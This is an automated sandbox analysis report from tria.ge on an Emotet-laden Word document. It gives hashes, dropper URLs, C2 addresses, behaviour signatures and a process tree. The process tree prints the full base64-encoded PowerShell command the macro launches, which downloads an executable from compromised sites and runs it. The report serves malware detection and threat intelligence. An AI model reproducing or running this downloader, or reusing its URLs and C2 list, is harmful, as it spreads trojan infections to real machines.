Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    60s
  • max time network
    55s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    17/07/2020, 19:19

General

  • Target

    2157e86f3671697567de6df4003777938813cd4726e2781af97a32a44490aff7.doc

  • Size

    192KB

  • MD5

    d06d509c893118bd55b15ae95199d3bb

  • SHA1

    dd0356ce0a0eeaa952ef15604baf9d6489cf038b

  • SHA256

    2157e86f3671697567de6df4003777938813cd4726e2781af97a32a44490aff7

  • SHA512

    e6031cc2033eface983a7d148bacd7fa62a5c75c9f841ee89dbec5aeca7dad463c62bba4a73e64423e0484e67f8231a9b1ade57184adfe473a80cd632330d55d

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://www.20190607.com/wp-admin/ixyjozs/

exe.dropper

https://lovely-lollies.com/wp-admin/fgvid/

exe.dropper

https://www.angage.com/wp-content/mtincvc/

exe.dropper

https://connect-plus.co.uk/aspnet_client/3yey3rr/

exe.dropper

http://mapas.hoonicorns.pt/comp3/ly8cmti/

Extracted

Family

emotet

C2

109.117.53.230:443

212.51.142.238:8080

190.160.53.126:80

139.59.60.244:8080

91.211.88.52:7080

190.108.228.62:443

186.208.123.210:443

46.105.131.87:80

173.91.22.41:80

222.214.218.37:4143

31.31.77.83:443

62.75.141.82:80

93.156.165.186:80

93.51.50.171:8080

185.94.252.104:443

78.189.165.52:8080

95.179.229.244:8080

73.11.153.178:8080

203.153.216.189:7080

95.213.236.64:8080

rsa_pubkey.plain

Signatures

  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 280 IoCs
  • Drops file in System32 directory 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Blacklisted process makes network request 3 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2157e86f3671697567de6df4003777938813cd4726e2781af97a32a44490aff7.doc"
    1⤵
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1392
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABuAG8AdQBnAD0AJwBtAGEAdQBsAHQAbwBlAHoAdgBlAHUAawByAGkAbwB4AGIAZQB3AHgAaQBqACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBDAHUAcgBgAGkAVAB5AGAAUABgAFIATwB0AG8AYABDAE8AbAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAGoAYQBvAHQAaABwAGEAbwB0AGgAIAA9ACAAJwA4ADcAMAAnADsAJABsAG8AdQBxAHUAPQAnAGIAbwBvAHkAdwBlAGUAagBuAGUAYQBsAGsAZQBvAHYAJwA7ACQAZAB1AGIAawBlAG8AawBwAGkAcAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAagBhAG8AdABoAHAAYQBvAHQAaAArACcALgBlAHgAZQAnADsAJAB0AG8AYQB4AG4AbwBpAHIAZgBpAGUAdABzAG8AdQBuAHMAaQBxAHUAPQAnAHgAbwBlAHEAdQBuAG8AbwBsACcAOwAkAGMAdQBhAHQAaABjAGkAbwB5AD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlACcAKwAnAGMAdAAnACkAIABuAGUAdAAuAFcARQBiAEMAbABJAEUATgBUADsAJABjAGUAZQB4AHQAaABhAHUAYwBoAGgAZQBpAGYAPQAnAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuADIAMAAxADkAMAA2ADAANwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AaQB4AHkAagBvAHoAcwAvACoAaAB0AHQAcABzADoALwAvAGwAbwB2AGUAbAB5AC0AbABvAGwAbABpAGUAcwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AZgBnAHYAaQBkAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBhAG4AZwBhAGcAZQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAG0AdABpAG4AYwB2AGMALwAqAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0AC0AcABsAHUAcwAuAGMAbwAuAHUAawAvAGEAcwBwAG4AZQB0AF8AYwBsAGkAZQBuAHQALwAzAHkAZQB5ADMAcgByAC8AKgBoAHQAdABwADoALwAvAG0AYQBwAGEAcwAuAGgAbwBvAG4AaQBjAG8AcgBuAHMALgBwAHQALwBjAG8AbQBwADMALwBsAHkAOABjAG0AdABpAC8AJwAuACIAUwBwAEwAYABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABxAHUAaQBoAGoAbwB1AGYAagBlAGUAcABsAG8AbwBmAG0AZQBvAHYAPQAnAGwAbwBpAHQAaABtAGEAaQBjAGgAagBvAG8AZgBuAGEAZQB0ACcAOwBmAG8AcgBlAGEAYwBoACgAJAB5AGUAZQB5AG4AbwBvAGIAbgBpAG8AawBnAGkAbwBoAHgAdQByAHoAYQBpAHAAIABpAG4AIAAkAGMAZQBlAHgAdABoAGEAdQBjAGgAaABlAGkAZgApAHsAdAByAHkAewAkAGMAdQBhAHQAaABjAGkAbwB5AC4AIgBEAG8AVwBOAGAAbABPAGAAQQBEAEYASQBMAGUAIgAoACQAeQBlAGUAeQBuAG8AbwBiAG4AaQBvAGsAZwBpAG8AaAB4AHUAcgB6AGEAaQBwACwAIAAkAGQAdQBiAGsAZQBvAGsAcABpAHAAKQA7ACQAcgBhAGUAcQB1AGgAdQBhAHgAbABpAGEAagBqAGUAaQBrAD0AJwBtAGUAdwAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0ASQAnACsAJwB0AGUAbQAnACkAIAAkAGQAdQBiAGsAZQBvAGsAcABpAHAAKQAuACIATABlAG4AZwBgAFQASAAiACAALQBnAGUAIAAyADYAOAA4ADcAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACcAdwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAnACkALgAiAGMAUgBlAGAAQQB0AEUAIgAoACQAZAB1AGIAawBlAG8AawBwAGkAcAApADsAJABzAGkAZQBjAGgAaQBlAHQAYwBoAHUAYQBuAGMAbwBpAGwAZABlAGUAYwBoAHQAdQBhAGMAaAA9ACcAdABoAG8AdQBuACcAOwBiAHIAZQBhAGsAOwAkAGsAdQB1AGMAcABlAGEAZABmAGUAbwBnAGQAYQBlAHoAcwBlAHUAagA9ACcAcwBhAGsAbgBpAG8AcgBnAHUAegByAGkAbwBnAG4AdQB1AHoAYwBvAHQAaAAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABoAGUAdQBmAHIAbwBvAGsAcgBpAGEAagB0AGgAZQB1AGwAYwBpAGUAYgA9ACcAegBpAGEAcQB1AGMAbwBlAHgAdABoAGkAZQB6AG0AdQB1AGMAJwA=
    1⤵
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    • Blacklisted process makes network request
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    PID:1364
  • C:\Users\Admin\870.exe
    C:\Users\Admin\870.exe
    1⤵
    • Drops file in System32 directory
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    • Suspicious use of SetWindowsHookEx
    PID:1992
    • C:\Windows\SysWOW64\api-ms-win-downlevel-version-l1-1-0\utildll.exe
      "C:\Windows\SysWOW64\api-ms-win-downlevel-version-l1-1-0\utildll.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      PID:1104

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1104-193-0x00000000003B0000-0x00000000003BC000-memory.dmp

    Filesize

    48KB

  • memory/1392-86-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-160-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-5-0x000000000C140000-0x000000000C144000-memory.dmp

    Filesize

    16KB

  • memory/1392-6-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-8-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-10-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-11-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-12-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-13-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-15-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-17-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-19-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-21-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-23-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-25-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-27-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-29-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-92-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-33-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-35-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-37-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-39-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-41-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-43-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-45-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-47-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-49-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-50-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-51-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-52-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-53-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-54-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-56-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-58-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-60-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-62-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-64-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-66-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-68-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-70-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-72-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-74-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-76-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-78-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-80-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-82-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-84-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-2-0x0000000008A60000-0x0000000008A64000-memory.dmp

    Filesize

    16KB

  • memory/1392-4-0x000000000B0C0000-0x000000000B0C4000-memory.dmp

    Filesize

    16KB

  • memory/1392-88-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-31-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-94-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-96-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-98-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-100-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-102-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-104-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-106-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-108-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-110-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-112-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-114-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-116-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-118-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-120-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-122-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-124-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-126-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-128-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-130-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-132-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-134-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-136-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-138-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-140-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-142-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-144-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-146-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-148-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-150-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-152-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-154-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-156-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-158-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-90-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-162-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-164-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-166-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-168-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-170-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-172-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-174-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-176-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-178-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-180-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-182-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-184-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1392-186-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1992-190-0x0000000000260000-0x000000000026C000-memory.dmp

    Filesize

    48KB